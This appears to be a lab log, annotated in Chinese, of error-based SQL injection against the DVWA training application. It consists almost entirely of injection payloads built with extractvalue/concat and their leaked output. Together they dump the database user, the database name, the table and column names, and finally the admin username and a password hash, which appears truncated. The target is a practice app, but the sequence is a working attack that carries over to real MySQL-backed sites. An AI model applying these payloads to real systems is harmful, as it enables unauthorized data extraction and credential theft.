admin’ and extractvalue(1,concat(’~’,(select user()),’~’))#
'~root@localhost~'admin’ and extractvalue(1,concat(’~’,(select database()),’~’))#
'~dvwa~'admin’ and extractvalue(1,concat(’~’,(select concat(table_name) from information_schema.tables where table_schema=‘dvwa’ limit 0,1),’~’))#
guestbook '~users~'admin’ and extractvalue(1,concat(’~’,(select concat(table_name) from information_schema.tables where table_schema=‘dvwa’ limit 1,1),’~’))#
admin’ and extractvalue(1,concat(’~’,(select concat(table_name) from information_schema.tables where table_schema=‘dvwa’ limit 2,1),’~’))#
报错证明只有两张表
开始爆列名
admin’ and extractvalue(1,concat(’~’,(select concat(column_name) from information_schema.columns where table_name=‘users’ limit 0,1),’~’))#
'~user_id~'admin’ and extractvalue(1,concat(’~’,(select concat(column_name) from information_schema.columns where table_name=‘users’ limit 1,1),’~’))#
'~first_name~'admin’ and extractvalue(1,concat(’~’,(select concat(column_name) from information_schema.columns where table_name=‘users’ limit 2,1),’~’))#
~last_name~'admin’ and extractvalue(1,concat(’~’,(select concat(column_name) from information_schema.columns where table_name=‘users’ limit 3,1),’~’))#
'~user~'admin’ and extractvalue(1,concat(’~’,(select concat(column_name) from information_schema.columns where table_name=‘users’ limit 4,1),’~’))#
'~password~'admin’ and extractvalue(1,concat(’~’,(select concat(column_name) from information_schema.columns where table_name=‘users’ limit 5,1),’~’))#
'~avatar~'admin’ and extractvalue(1,concat(’~’,(select concat(column_name) from information_schema.columns where table_name=‘users’ limit 6,1),’~’))#
'~last_login~'.
.
.
.
admin’ and extractvalue(1,concat(’~’,(select concat(user) from dvwa.users limit 0,1),’~’))#
'~admin~'.
.
.
.
admin’ and extractvalue(1,concat(’~’,(select concat(password) from dvwa.users limit 0,1),’~’))#
5f4dcc3b5aa765d61d8327deb882cf9